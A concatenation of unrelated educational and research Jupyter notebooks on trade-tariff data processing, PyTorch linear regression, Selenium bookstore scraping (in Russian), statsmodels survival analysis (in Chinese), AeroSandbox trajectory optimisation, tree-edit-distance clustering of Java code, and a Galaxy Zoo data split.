``` trade_county["tariff"] = (trade_county["emplvl_2017"]/ trade_county["total_employment"])*trade_county["tariff"] trade_county["china_exp_pc"] = (trade_county["emplvl_2017"]/ trade_county["total_employment"])*trade_county["china_exp_pc"] trade_county["total_exp_pc"] = (trade_county["emplvl_2017"]/ trade_county["total_employment"])*trade_county["total_exp_pc"] os.getcwd() file_path = os.getcwd() + "\\data"+ "\\total_trade_data_2015.parquet" pq.write_table(pa.Table.from_pandas(trade_county.reset_index()), file_path) trade_county.sort_values(by = ["tariff","emplvl_2017"], ascending = False).head(50) exposure = pd.qcut(trade_county.xs('2015-1-1', level=1).tariff, 4 ,labels = False) most_exposed = exposure[exposure == 3].index.tolist() trade_county.loc[most_exposed].xs('2018-12-1', level=1).tariff.mean() exposure.head() ```
github_jupyter
<a href="https://colab.research.google.com/github/reallygooday/60daysofudacity/blob/master/Linear_Regression2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> Link to Colab Jupyter Notebook: https://colab.research.google.com/drive/19QYWp_lExrN65b6OesWS9NNA7x0fHKmq#scrollTo=KOl9mFXs7ja8 # Deep Learning using PyTorch Implementing Machine Learning based algorithm to train Linear Model to fit a set of data points. Getting comfortable making predictions by using Linear Model. Machine Leraning is the concept of building algorithms that can learn based on experience to detect and predict meaningful patterns. In Supervised Learning, algorithms are trained to make use of labeled data. Once introduced to new input, the algoritms are able to predict a corresponding output. ``` # import relevant Torch Library !pip3 install torch import torch from torch.nn import Linear w = torch.tensor(3.0, requires_grad=True) #weight b = torch.tensor(1.0, requires_grad=True)#bias def forward(x): # forward-function with one argument y =w*x + b return y x =torch.tensor(2) forward(x) x = torch.tensor([[4],[7]]) # making predictins for 4 and 7, two separate inputs forward(x) ``` * 13 is prediction for 4; * 22 is prediction for 7 ``` torch.manual_seed(1) # set a seed for generating random number for the Linear Class model = Linear(in_features =1, out_features=1) # for every single input calculate single ouput print(model.bias, model.weight) # obtain the optimal parameters to fit the data x = torch.tensor([2.0]) # float number # passing x as input # passing multiple input x = torch.tensor([[2.0],[3.3]]) model(x) import torch.nn as nn # Linear Regression Class # creating objects, new instances of Linear Regression Class # class is followed by init method(constructer, initializer) class LR(nn.Module): def __init__(self,input_size,output_size): super().__init__() # template to create custom class self.Linear = 
nn.Linear(input_size,output_size) def forward(self, x): pred = self.Linear(x) return pred torch.manual_seed(1) model = LR(1,1) print(list(model.parameters())) ``` weight equals 0.5153 bias equals -0.4414 ``` x = torch.tensor([1.0]) # single input, single output print(model.forward(x)) x = torch.tensor([[1.0],[2.0]]) # multiple input, multiple output print(model.forward(x)) ``` # Train model to fit a dataset. ``` import matplotlib.pyplot as plt x = torch.randn(100,1)*10 # returns a tensor filled with random numbers y = x print(x) ``` Each datapoint is characterized by X and Y coordinates. Fitting a linear model into a straight line of data points. ``` x = torch.randn(100,1)*10 y = x # output equals input plt.plot(x.numpy(), y.numpy()) ``` This results in a straight line of datapoints. # Creating noisy dataset. Adding noise to output to each Y value and shift upwards and downwards. Noise will be normally distributed accross the entire range. ``` x = torch.randn(100,1)*10 y = x + 3*torch.randn(100,1) # multiply noise ratio by 3 to make noise reasonably significant plt.plot(x.numpy(), y.numpy(), 'o') plt.ylabel('Y') plt.xlabel('X') class LR(nn.Module): def __init__(self,input_size,output_size): super().__init__() # template to create custom class self.Linear = nn.Linear(input_size,output_size) def forward(self, x): pred = self.Linear(x) return pred torch.manual_seed(1) model = LR(1,1) print(model) print(list(model.parameters())) [w,b] = model.parameters() w1=w[0][0].item() b1=b[0].item() print(w1,b1) # parameters, tensor values [w,b] = model.parameters() print(w,b) w1=w[0][0] b1=b[0] print(w1,b1) def get_params(): return() # parameters, tensor values [w,b] = model.parameters() w1=w[0][0] b1=b[0] print(w1,b1) def get_params(): return(w[0][0].item(), b[0].item()) ``` # Plot Linear Model alongside datapoints. Determine numerical expression for x1 and y1. 
```
import numpy as np

def plot_fit(title):
    # Draw the current linear model (red line) over the scatter of data points.
    # NOTE(fix): the original did "plt.title = title", which *replaces* the
    # pyplot title function with a string instead of setting the plot title.
    plt.title(title)
    w1, b1 = get_params()
    x1 = np.array([-30, 30])
    y1 = w1*x1 + b1
    plt.plot(x1, y1, 'r')
    plt.scatter(x, y)
    plt.show()

plot_fit('Initial Model')
```

The line doesn't fit the data. It would be better to use the Gradient Descent Algorithm to adjust the parameters.

```
criterion = nn.MSELoss()
optimizer = torch.optim.SGD(model.parameters(), lr = 0.01)

epochs = 100
losses = []
for i in range(epochs):
    y_pred = model.forward(x)
    loss = criterion(y_pred, y)
    print('epochs:', i, 'loss:', loss.item())
    # NOTE(fix): store the scalar value rather than the loss tensor --
    # appending the tensor keeps the whole autograd graph alive each epoch.
    losses.append(loss.item())

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

plot_fit('Trained Model')
```

The Linear Model has been trained to fit the training data using gradient descent.
github_jupyter
# Python для анализа данных *Алла Тамбовцева, НИУ ВШЭ* дополнения: *Ян Пиле, НИУ ВШЭ* Посмотрим на другие примеры использования `selenium`. **Пример.** Зайдем на сайт книжного магазина и найдем все книги про Python. Загрузим библиотеку, веб-драйвер и откроем страницу в браузере через Python. ``` from selenium import webdriver as wb br = wb.Firefox() # открываем страницу в Chrome в автоматическом режиме br.get("http://www.biblio-globus.ru/") ``` Найдем с помощью CSS Selector'а (*SelectorGadget*) поле для ввода названия книги или автора. ``` field = br.find_element_by_css_selector("input") ``` Сохраним запрос: ``` author = "Python" # переменная author - условность ``` Введем запрос в поле для поиска (`.send_keys`) и подождем чуть-чуть: ``` field.send_keys(author) br.implicitly_wait(2) # подождем пару секунд ``` Теперь найдем кнопку для поиска (значок *лупа* рядом со строкой поиска) через CSS Selector: ``` submit = br.find_element_by_css_selector("#search_submit") ``` Кликнем на нее: ``` submit.click() ``` Сохраним первую страницу с результатами в переменную `page1`. ``` page1 = br.page_source page1 ``` Теперь обработаем эту страницу через `BeautifulSoup`: ``` from bs4 import BeautifulSoup soup1 = BeautifulSoup(page1, 'lxml') ``` Найдем все названия книг на этой странице. По исходному коду можно увидеть, что они имеют тэг `a` с атрибутом `class`, равным `name`: ``` soup1.find_all('a', {'class':'name'}) ``` С помощью списковых включений выберем из ссылок с тэгом `<a>` текст (так мы уже делали, и не раз). 
```
books1 = [b.text for b in soup1.find_all('a', {'class':'name'})]
books1
```

Теперь аналогичным образом сгрузим информацию об авторах:

```
authors1 = [a.text for a in soup1.find_all('div', {'class': 'author'})]
```

Сгрузим расположение:

```
place1 = [p.text for p in soup1.find_all('div', {'class':'placement'})]
place1
```

И, конечно, цену:

```
price1 = [p.text for p in soup1.find_all('div', {'class':'title_data price'})]
price1
```

Осталось пройтись по всем страницам, которые были выданы в результате поиска. Для примера перейдем на страницу 2 и на этом остановимся.

```
next_p = br.find_element_by_css_selector('.next_page')
next_p.click()
```

Проделаем то же самое, что и с первой страницей. По-хорошему нужно написать функцию, которая будет искать на странице названия книг, их расположение и цену. Но оставим это в качестве задания читателю :)

```
page2 = br.page_source
soup2 = BeautifulSoup(page2, 'lxml')

books2 = [b.text for b in soup2.find_all('a', {'class':'name'})]
author2 = [a.text for a in soup2.find_all('div', {'class': 'author'})]
place2 = [p.text for p in soup2.find_all('div', {'class':'placement'})]
price2 = [p.text for p in soup2.find_all('div', {'class':'title_data price'})]
```

Расширим списки результатов с первой страницы данными, полученными со второй страницы, используя метод `.extend()`.

```
books1.extend(books2)
# NOTE(fix): the original extended the author list with *book titles*
# (authors1.extend(books2)); the page-2 author list is named "author2".
authors1.extend(author2)
place1.extend(place2)
price1.extend(price2)
```

Осталось импортировать библиотеку `pandas` и создать датафрейм.

```
import pandas as pd
```

Для разнообразия создадим датафрейм не из списка списков, а из словаря. Ключами словаря будут названия столбцов в таблице, а значениями – списки с сохраненной информацией (названия книг, цены и проч.).

```
df = pd.DataFrame({'book': books1, 'author': authors1, 'placement': place1, 'price': price1})
df.head()
```

Давайте приведем столбец с ценой к числовому типу. Уберем слова *Цена* и *руб*, а потом сконвертируем строки в числа с плавающей точкой.
Напишем функцию `get_price()`, ``` def get_price(price): book_price = price.split(' ')[1] # разобьем строку по пробелу и возьмем второй элемент book_price = book_price.replace(',', '.') # заменим запятую на точку price_num = float(book_price) # сконвертируем в float return price_num import re def preis(x): return float('.'.join(re.findall(r'\d+',x))) # проверка get_price(df.price[0]) preis(df.price[0]) ``` Всё отлично работает! Применим функцию к столбцу *price* и создадим новый столбец *nprice*. ``` df['nprice'] = df.price.apply(preis) df.head() ``` Теперь можем расположить книги по цене в порядке возрастания: ``` df.sort_values('nprice') ``` И сохраним всю таблицу в csv-файл: ``` df.to_csv("books.csv") ```
github_jupyter
生存分析是用于分析直到一个或多个事件发生的预期持续时间的统计分支,例如生物有机体中的死亡和机械系统中的失败。本主题被称为可靠性理论和可靠性分析的工程,持续时间分析或持续时间建模在经济学和事件历史分析,在社会学。生存分析试图回答以下问题:在一定时间内存活的人口比例是多少?那些幸存下来的人会以什么样的速度死亡或失败?可以考虑多种死亡原因吗?具体情况或特征如何增加或减少生存的概率? 理论链接: 生存分析(survival analysis)https://www.cnblogs.com/wwxbi/p/6136348.html 生存分析学习笔记https://blog.csdn.net/jaen_tail/article/details/79081954 statsmodels.duration实现了几种处理删失数据的标准方法。当数据由起始时间点和某些感兴趣事件发生的时间之间的持续时间组成时,最常使用这些方法。 目前只处理右侧审查。当我们知道在给定时间t之后发生事件时发生了右删失,但我们不知道确切的事件时间。 **生存函数估计和推理** statsmodels.api.SurvfuncRight类可以被用来估计可以右删失数据的生存函数。 SurvfuncRight实现了几个推理程序,包括生存分布分位数的置信区间,生存函数的逐点和同时置信带以及绘图程序。duration.survdiff函数提供了比较生存分布的检验程序。 **Example** 在这里,我们SurvfuncRight使用flchain研究中的数据创建一个对象 ,该数据可通过R数据集存储库获得。我们只适合女性受试者的生存分布。 ``` import statsmodels.api as sm data = sm.datasets.get_rdataset("flchain", "survival").data df = data.loc[data.sex == "F", :] sf = sm.SurvfuncRight(df["futime"], df["death"]) # 通过调用summary方法可以看出拟合生存分布的主要特征 sf.summary().head() #我们可以获得生存分布的分位数的点估计和置信区间。 #由于在这项研究中只有约30%的受试者死亡,我们只能估计低于0.3概率点的分位数 sf.quantile(0.25) sf.quantile_ci(0.25) ``` 要绘制单个生存函数,请调用plot方法: ``` sf.plot() ``` 由于这是一个包含大量删失的大型数据集,我们可能希望不绘制删失符号: ``` fig = sf.plot() ax = fig.get_axes()[0] pt = ax.get_lines()[1] pt.set_visible(False) #我们还可以为情节添加95%的同时置信带。通常,这些波段仅针对分布的中心部分绘制。 fig = sf.plot() lcb, ucb = sf.simultaneous_cb() ax = fig.get_axes()[0] ax.fill_between(sf.surv_times, lcb, ucb, color='lightgrey') ax.set_xlim(365, 365*10) ax.set_ylim(0.7, 1) ax.set_ylabel("Proportion alive") ax.set_xlabel("Days since enrollment") #在这里,我们在同一轴上绘制两组(女性和男性)的生存函数: gb = data.groupby("sex") ax = plt.axes() sexes = [] for g in gb: sexes.append(g[0]) sf = sm.SurvfuncRight(g[1]["futime"], g[1]["death"]) sf.plot(ax) li = ax.get_lines() li[1].set_visible(False) li[3].set_visible(False) plt.figlegend((li[0], li[2]), sexes, "center right") plt.ylim(0.6, 1) ax.set_ylabel("Proportion alive") ax.set_xlabel("Days since enrollment") ``` 我们可以正式比较两个生存分布survdiff,它实现了几个标准的非参数程序。默认程序是logrank检测: ``` stat, pv = sm.duration.survdiff(data.futime, 
data.death, data.sex) #以下是survdiff实施的一些其他测试程序 # Fleming-Harrington with p=1, i.e. weight by pooled survival time stat, pv = sm.duration.survdiff(data.futime, data.death, data.sex, weight_type='fh', fh_p=1) # Gehan-Breslow, weight by number at risk stat, pv = sm.duration.survdiff(data.futime, data.death, data.sex, weight_type='gb') # Tarone-Ware, weight by the square root of the number at risk stat, pv = sm.duration.survdiff(data.futime, data.death, data.sex, weight_type='tw') ``` **回归方法** 比例风险回归模型(“Cox模型”)是用于删失数据的回归技术。它们允许以协变量的形式解释事件的时间变化,类似于线性或广义线性回归模型中所做的。这些模型以“风险比”表示协变量效应,这意味着危险(瞬时事件率)乘以给定因子,取决于协变量的值。 ``` import statsmodels.api as sm import statsmodels.formula.api as smf data = sm.datasets.get_rdataset("flchain", "survival").data del data["chapter"] data = data.dropna() data["lam"] = data["lambda"] data["female"] = (data["sex"] == "F").astype(int) data["year"] = data["sample.yr"] - min(data["sample.yr"]) status = data["death"].values mod = smf.phreg("futime ~ 0 + age + female + creatinine + " "np.sqrt(kappa) + np.sqrt(lam) + year + mgus", data, status=status, ties="efron") rslt = mod.fit() print(rslt.summary()) ```
github_jupyter
# Block Move in Fixed Time Here, we look at a problem called "Block Move". Block Move is a very simple optimal control problem defined by Matthew Kelly in the paper *[An Introduction to Trajectory Optimization: How to Do Your Own Direct Collocation](https://epubs.siam.org/doi/10.1137/16M1062569)*. The basics of the problem are this: ----- Suppose we have a block with a unit mass on a frictionless surface; the block can slide forward and backwards along a number line $x$. At $t=0$, the block starts at $x=0$ with velocity $v=0$. At $t=1$, we want the block to have moved to $x=1$ and again be stationary with $v=0$. We are allowed to apply any amount of force $u(t)$ to the block, but we want to find the path that minimizes the amount of "effort" applied. We measure "effort" as the integral $\int_0^1 u(t)^2\ dt$. What should our force input $u(t)$ be? ----- Let's solve the problem. First, we do some boilerplate setup: ``` import aerosandbox as asb import aerosandbox.numpy as np opti = asb.Opti() n_timesteps = 300 mass_block = 1 ``` Then, we define our time vector, our state vectors, and our force vector. ``` time = np.linspace(0, 1, n_timesteps) position = opti.variable( init_guess=np.linspace(0, 1, n_timesteps) # Guess a trajectory that takes us there linearly. ) velocity = opti.derivative_of( position, with_respect_to=time, derivative_init_guess=1, # Guess a velocity profile that is uniform over time. ) force = opti.variable( init_guess=np.linspace(1, -1, n_timesteps), # Guess that the force u(t) goes from 1 to -1 over the time window. n_vars=n_timesteps ) ``` We can't forget to constrain the derivative of velocity to be equal to the acceleration! 
``` opti.constrain_derivative( variable=velocity, with_respect_to=time, derivative=force / mass_block, # F = ma ) ``` Now, we compute the amount of effort expended using a numerical integral: ``` effort_expended = np.sum( np.trapz(force ** 2) * np.diff(time) ) opti.minimize(effort_expended) ``` Can't forget to add those boundary conditions! Some notes: * *"Wait, isn't $x=0$ an initial condition, not a boundary condition?"* There is no mathematical difference between *initial conditions* and *boundary conditions*. We use the phrase "boundary conditions" to refer to both. This helps eliminate any confusion between "initial conditions" and "initial guesses". * *"Wait, what's the difference between initial conditions and initial guesses?"* "Initial conditions" are really just boundary conditions that happen to be applied at the boundary $t=0$. "Initial guesses" are our best guess for each of our design variables - basically, our best guess for the optimal trajectory. It is so important that the distinction be understood! Again, we use the "boundary conditions" catch-all rather than "initial conditions" to help reinforce this distinction. Now for those boundary conditions: ``` opti.subject_to([ position[0] == 0, position[-1] == 1, velocity[0] == 0, velocity[-1] == 0, ]) ``` Now, we solve. ``` sol = opti.solve() ``` This actually solves in just one iteration because it is a quadratic program with only linear (equality) constraints. 
Let's plot what our solution looks like: ``` import matplotlib.pyplot as plt import seaborn as sns fig, ax = plt.subplots(1, 1, figsize=(6.4, 4.8), dpi=200) plt.plot(sol.value(time), sol.value(position)) plt.xlabel(r"Time") plt.ylabel(r"Position") plt.title(r"Position") plt.tight_layout() plt.show() fig, ax = plt.subplots(1, 1, figsize=(6.4, 4.8), dpi=200) plt.plot(sol.value(time), sol.value(velocity)) plt.xlabel(r"Time") plt.ylabel(r"Velocity") plt.title(r"Velocity") plt.tight_layout() plt.show() fig, ax = plt.subplots(1, 1, figsize=(6.4, 4.8), dpi=200) plt.plot(sol.value(time), sol.value(force)) plt.xlabel(r"Time") plt.ylabel(r"Force") plt.title(r"Force") plt.tight_layout() plt.show() ``` That makes sense! We can actually prove optimality of these functions here using calculus of variations; see Appendix B of the Kelly paper for more details.
github_jupyter
``` import numpy as np import pandas as pd import scipy import psycopg2 %matplotlib inline import matplotlib.pyplot as plt import seaborn as sns import os import json from collections import Counter def parse_testdata(path='../data/rainfall-submissions.tsv'): file = open(path,'r') raw = file.readlines() file.close() res = dict() exid = "3c79c115-0f5f-4d8e-b02c-b4b33155a4b3" get_code = lambda data: data["mooc-2017-ohjelmointi"]["osa02-Osa02_16.MarsinLampotilanKeskiarvo"]["/src/MarsinLampotilanKeskiarvo.java"] for line in raw: id = line[:len(exid)] body = json.loads(line[len(exid):]) res[id] = get_code(body) return res def parse_testdata_df(path='../data/rainfall-submissions.tsv'): file = open(path,'r') raw = file.readlines() file.close() ids = [None] * len(raw) code = [None] * len(raw) exid = "3c79c115-0f5f-4d8e-b02c-b4b33155a4b3" get_code = lambda data: data["mooc-2017-ohjelmointi"]["osa02-Osa02_16.MarsinLampotilanKeskiarvo"]["/src/MarsinLampotilanKeskiarvo.java"] for i, line in enumerate(raw): id = line[:len(exid)] body = json.loads(line[len(exid):]) ids[i] = id code[i] = get_code(body) return pd.DataFrame({ "ids": ids, "code": code }) rain = parse_testdata() rain_df = parse_testdata_df() rain_df print(rain['b4df7baf-1ba2-4a67-8b82-dabc5a1a0bb8']) import antlr4 from antlr_local.generated.JavaLexer import JavaLexer from antlr_local.generated.JavaParser import JavaParser from antlr_local.generated.JavaParserListener import JavaParserListener from antlr_local.MyListener import KeyPrinter from antlr_local.TreeListener import TreeListener, Node from antlr_local.java_tokens import tokenTypes, interestingTokenTypes, rareTokenTypes from antlr_local.java_parsers import parse_ast_complete, parse_ast_keywords, parse_ast_modified import pprint from antlr4 import RuleContext from collections import Counter code = rain['b4df7baf-1ba2-4a67-8b82-dabc5a1a0bb8'] code2 = rain['a7970347-f720-472f-9b2d-e4dbdc8c604c'] def parse_tree(code): code_stream = antlr4.InputStream(code) lexer = 
JavaLexer(code_stream) token_stream = antlr4.CommonTokenStream(lexer) parser = JavaParser(token_stream) tree = parser.compilationUnit() return tree tree = parse_tree(code) tree2 = parse_tree(code2) printer = KeyPrinter() treeListener = TreeListener() walker = antlr4.ParseTreeWalker() walker.walk(printer, tree) walker.walk(treeListener, tree) t1 = treeListener.get_tree() treeListener.reset() walker.walk(treeListener, tree2) t2 = treeListener.get_tree() print(str(t1)) print(str(t2)) print(printer.get_result()) from zss import simple_distance, Node as ZNode def genZssTree(node): n = ZNode(node.label) for c in node.children: n.addkid(genZssTree(c)) return n tz1 = genZssTree(t1) tz2 = genZssTree(t2) simple_distance(tz1, tz2) class Node(object): def __init__(self, parent, label, depth=0): self.label = label self.children = [] self.parent = parent self.depth = depth def addChild(self, node): self.children.append(node) return self def getParent(self): return self.parent def toList(self): return [self.label] + [l for lst in [c.toList() for c in self.children] for l in lst] def __str__(self): n = f'{self.depth}:{self.label}' s = '\n'.join([n]+[str(c) for c in self.children]) padding = ' ' * self.depth return f'{padding} {s}' def __len__(self): return 1 + sum([len(c) for c in self.children]) def getRule(antlrNode, parser): return parser.ruleNames[antlrNode.getRuleIndex()] def getTokenType(n): t = n.getSymbol().type if t in tokenTypes: return tokenTypes[t] return None def generate_complete_tree(parentNode, antlrNode, parser): name = getRule(antlrNode, parser) depth = antlrNode.depth() n = Node(parentNode, name, depth) for child in antlrNode.children: if hasattr(child, 'getRuleIndex'): n.addChild(generate_complete_tree(n, child, parser)) elif hasattr(child, 'getSymbol'): token_type = getTokenType(child) if token_type: n.addChild(Node(parentNode, token_type, depth + 1)) else: print('unknown node') return n def parse_complete_tree(code): code_stream = antlr4.InputStream(code) 
lexer = JavaLexer(code_stream) token_stream = antlr4.CommonTokenStream(lexer) parser = JavaParser(token_stream) tree = parser.compilationUnit() t = generate_complete_tree(Node(None, 'root', 0), tree, parser) return t t = parse_complete_tree(code) l = t.toList() l from zss import simple_distance, Node as ZNode def getTokenType(n): t = n.getSymbol().type if t in tokenTypes: return tokenTypes[t] print(f'unknown {t}') return f'unknown {t}' def generate_tree(parentNode, antlrNode): name = parser.ruleNames[antlrNode.getRuleIndex()] depth = antlrNode.depth() n = Node(parentNode, name, depth) for child in antlrNode.children: if hasattr(child, 'getRuleIndex'): n.addChild(generate_tree(n, child)) elif hasattr(child, 'getSymbol'): n.addChild(Node(parentNode, getTokenType(child), depth + 1)) else: print('unknown node') return n def generate_ztree(parentNode, antlrNode): name = parser.ruleNames[antlrNode.getRuleIndex()] depth = antlrNode.depth() n = ZNode(name) for child in antlrNode.children: if hasattr(child, 'getRuleIndex'): n.addkid(generate_tree(n, child)) elif hasattr(child, 'getSymbol'): n.addkid(ZNode(getTokenType(child))) else: print('unknown node') return n root = Node(None, 'root', 0) t = generate_tree(root, tree) t2 = generate_tree(root, tree2) tz1 = generate_ztree(ZNode('root'), tree) tz2 = generate_ztree(ZNode('root'), tree2) len(t) simple_distance(tz1, tz2) print(str(t)) print(rain['b4df7baf-1ba2-4a67-8b82-dabc5a1a0bb8']) ``` # Model ``` import numpy as np import pandas as pd from sklearn.feature_extraction.text import CountVectorizer from sklearn.feature_extraction.text import TfidfTransformer from sklearn.metrics.pairwise import cosine_similarity from sklearn.manifold import TSNE from sklearn.decomposition import TruncatedSVD from sklearn import manifold from sklearn.cluster import DBSCAN, OPTICS, KMeans import hdbscan import umap import antlr4 from antlr4 import RuleContext from antlr_local.generated.JavaLexer import JavaLexer from 
antlr_local.generated.JavaParser import JavaParser from antlr_local.generated.JavaParserListener import JavaParserListener from antlr_local.MyListener import KeyPrinter from antlr_local.TreeListener import TreeListener, Node from antlr_local.java_tokens import tokenTypes, interestingTokenTypes, rareTokenTypes from antlr_local.java_parsers import parse_ast_complete, parse_ast_keywords, parse_ast_modified from antlr_local.java_parsers import parse_ast_complete, parse_ast_keywords, parse_ast_modified from zss import simple_distance, Node as ZNode def parse_testdata(path='../data/rainfall-submissions.tsv'): file = open(path,'r') raw = file.readlines() file.close() res = dict() exid = "3c79c115-0f5f-4d8e-b02c-b4b33155a4b3" get_code = lambda data: data["mooc-2017-ohjelmointi"]["osa02-Osa02_16.MarsinLampotilanKeskiarvo"]["/src/MarsinLampotilanKeskiarvo.java"] for line in raw: id = line[:len(exid)] body = json.loads(line[len(exid):]) res[id] = get_code(body) return res def counts_to_id_dict(ids, counts): d = {} for i, c in enumerate(counts): if None in c: c.pop(None) if len(c) != 0: d[ids[i]] = dict(c) return d def create_clusters(labels, submissionIds): res = {} for c in set(labels): res[c] = [submissionIds[idx] for idx, label in enumerate(labels) if label == c] return res def genZssTree(node): n = ZNode(node.label) for c in node.children: n.addkid(genZssTree(c)) return n def parse_to_tree(code): code_stream = antlr4.InputStream(code) lexer = JavaLexer(code_stream) token_stream = antlr4.CommonTokenStream(lexer) parser = JavaParser(token_stream) tree = parser.compilationUnit() treeListener = TreeListener() walker = antlr4.ParseTreeWalker() walker.walk(treeListener, tree) t = genZssTree(treeListener.get_tree()) return t def parse_ast(codeList): return [parse_to_tree(c) for c in codeList] def cluster_dist_matrix(dist_matrix, clustering_params): params = clustering_params or {} name = params.get('name') if name == 'DBSCAN' or name is None: min_samples = 
params.get('min_samples') or 5 eps = params.get('eps') or 0.5 metric = 'precomputed' dbscan = DBSCAN(min_samples=min_samples, metric=metric, eps=eps).fit(dist_matrix) return dbscan.labels_ elif name == 'HDBSCAN': min_cluster_size = params.get('min_cluster_size') or 2 min_samples = params.get('min_samples') or 5 metric = 'precomputed' show_linkage_tree = params.get('show_linkage_tree') or False clusterer = hdbscan.HDBSCAN( min_cluster_size=min_cluster_size, min_samples=min_samples, metric=metric, gen_min_span_tree=show_linkage_tree ) clusterer.fit(dist_matrix) #plt.figure(3, figsize=(24,8)) #clusterer.single_linkage_tree_.plot(cmap='viridis', colorbar=True) return clusterer.labels_ elif name == 'OPTICS': min_samples = params.get('min_samples') or 5 max_eps = params.get('max_eps') or np.inf if int(max_eps) == -1: max_eps = np.inf metric = 'precomputed' optics = OPTICS(min_samples=min_samples, metric=metric, max_eps=max_eps).fit(dist_matrix) return optics.labels_ elif name == 'KMeans': n_clusters = params.get('k_clusters') or 8 kmeans = KMeans(n_clusters=n_clusters).fit(dist_matrix) return kmeans.labels_ else: raise ValueError(f'cluster_dist_matrix(): Unknown clustering method name: {name}') def reduce_to_2d(tfidf, dim_visualization_params={}): params = dim_visualization_params or {} name = params.get('name') if name == 'UMAP': n_neighbors = params.get('n_neighbors') or 30 min_dist = params.get('min_dist') or 0.0 return umap.UMAP( n_components=2, n_neighbors=n_neighbors, min_dist=min_dist, ).fit_transform(tfidf) else: perplexity = params.get('perplexity') or 30 svd_n_components = params.get('svd_n_components') matrix = tfidf if svd_n_components is not None: matrix = TruncatedSVD( n_components=svd_n_components, random_state=0 ).fit_transform(tfidf) return TSNE( n_components=2, perplexity=perplexity ).fit_transform(matrix) def run_ted(submissionIds, codeList, token_set='modified', random_seed=-1, clustering_params={}, dim_visualization_params={}): documents = 
len(codeList) df = pd.DataFrame({ "trees": parse_ast(codeList), "ids": submissionIds }) if random_seed != -1: np.random.seed(random_seed) return df import psycopg2 from dotenv import load_dotenv import os import json load_dotenv() POSTGRES_HOST = os.getenv("DB_HOST") POSTGRES_PORT = os.getenv("DB_PORT") POSTGRES_DB = os.getenv("DB_NAME") POSTGRES_USER = os.getenv("DB_USER") POSTGRES_PASSWORD = os.getenv("DB_PASSWORD") conn = psycopg2.connect(host=POSTGRES_HOST, port=POSTGRES_PORT, database=POSTGRES_DB, user=POSTGRES_USER, password=POSTGRES_PASSWORD) cur = conn.cursor() class NumpyEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, np.ndarray): return obj.tolist() return json.JSONEncoder.default(self, obj) def query_many(query): cur.execute(query) return cur.fetchall() def cluster_submissions(courseId, exerciseId): rows = query_many(f""" SELECT submission_id, code FROM submission WHERE course_id = {courseId} AND exercise_id = {exerciseId} """) submissionIds = [r[0] for r in rows] codeList = [r[1] for r in rows] token_set = 'modified' random_seed = 1 clustering_params = { 'name': 'DBSCAN', 'min_cluster_size': 2, 'k_clusters': 3 } dim_visualization_params = { 'name': 'TSNE', 'perplexity': 30 } ted_result = run_ted(submissionIds, codeList, token_set, random_seed, clustering_params, dim_visualization_params) return { "ted": ted_result } res = cluster_submissions(2, 4) res df = res['ted'] df.head(5) import math def distance_matrix(pattern): # to get the side length, solve for n where len(pattern) = n*(n + 1)/2 (triangular number formula) side_length = (int(math.sqrt(1 + 8 * len(pattern))) - 1) // 2 + 1 assert (side_length * (side_length - 1)) // 2 == len(pattern), "Pattern length must be a triangular number." 
# create the grid grid = [[0] * side_length for i in range(side_length)] # fill in the grid position = 0 for i in range(0, side_length - 1): for j in range(0, side_length - 1 - i): element = pattern[position]; position += 1 grid[i][i + j + 1] = element # fill in the upper triangle grid[i + j + 1][i] = element # fill in the lower triangle return grid distance_matrix(np.array([1,2,3,4,5,6,7,8,9,10])) import itertools import multiprocessing from functools import partial import time def f(treePair): return simple_distance(treePair[0], treePair[1]) def fast_ted(df): cores = multiprocessing.cpu_count() -1 or 1 print(f'Running fast_ted with {cores} cores') before = time.time() trees = list(itertools.combinations(df['trees'], 2)) p = multiprocessing.Pool(cores) arr = p.map(f, trees) after = time.time() print('Time spent ' + str(after - before)) dmat = distance_matrix(arr) return np.array(dmat) dist_mat = fast_ted(df) np.save('ted_dist_matrix.npy', dist_mat) dist_mat = np.array(distance_matrix(dist_mat2)) dist_mat clustering_params = { 'name': 'HDBSCAN', 'min_cluster_size': 2, 'k_clusters': 3 } labels = cluster_dist_matrix(dist_mat, clustering_params) labels X_reduced = TruncatedSVD(n_components=30, random_state=0).fit_transform(dist_mat) dim_visualization_params = { 'name': 'TSNE', 'perplexity': 30 } X_embedded = reduce_to_2d(X_reduced, dim_visualization_params) submissionIds = res['ted']['ids'].values clusters = create_clusters(labels, submissionIds) coordinates = [{ 'id': submissionIds[i], 'x': d[0], 'y': d[1], 'cluster': labels[i] } for (i, d) in enumerate(X_embedded)] import matplotlib.pyplot as plt import seaborn as sns cluster = [x['cluster'] for x in coordinates] plt.figure(3, figsize=(10,6)) for i, c in enumerate(np.unique(cluster)): x = [x['x'] for x in coordinates if x['cluster'] == c] y = [x['y'] for x in coordinates if x['cluster'] == c] plt.scatter(x, y, marker="o", cmap='jet', label=c) plt.legend(loc='center left', bbox_to_anchor=(1, 0.5)) plt.show() 
plt.figure(3, figsize=(10,6)) plt.imshow(dist_mat, zorder=2, cmap='Blues', interpolation='nearest') plt.colorbar() plt.show() ```
github_jupyter
#### *** Adjust the path parameter to user local catalog location.*** ``` # Local directory path for the galaxy zoo 2 catalog dir_cat = "/home/hhg/Research/galaxyClassify/catalog/galaxyZoo/zoo2/" ``` ## ------------ start ------------ ``` import numpy as np import pandas as pd import matplotlib.pyplot as plt %config InlineBackend.figure_format='retina' df = pd.read_csv(dir_cat+'gz2_all_v2.csv') df df.groupby(['label_8']).size() ``` ## data_split ``` file_csv = dir_cat+'gz2_all_v2.csv' f_train = 0.64 f_valid = 0.16 f_test = 0.20 seed = 3 # import sys # sys.path.append('../galaxyZooNet/') # from datasets import data_split import pandas as pd from sklearn.model_selection import train_test_split def data_split(file_csv, f_train=0.64, f_valid=0.16, f_test=0.20, random_state=None, stats=False, label_tag='label_8'): '''train-valid-test splits Args: file_csv (str) : path to the full catalog csv file f_train, f_valid, f_test : fractions of training, validation, test samples stats (bool): display splitting statistics if True Returns: df_train (pd.dataframes) : splitted training sample df_valid (pd.dataframes) : validation df_test (pd.dataframes) : test ''' assert f_train + f_valid + f_test == 1, 'fractions have to sum to 1.' 
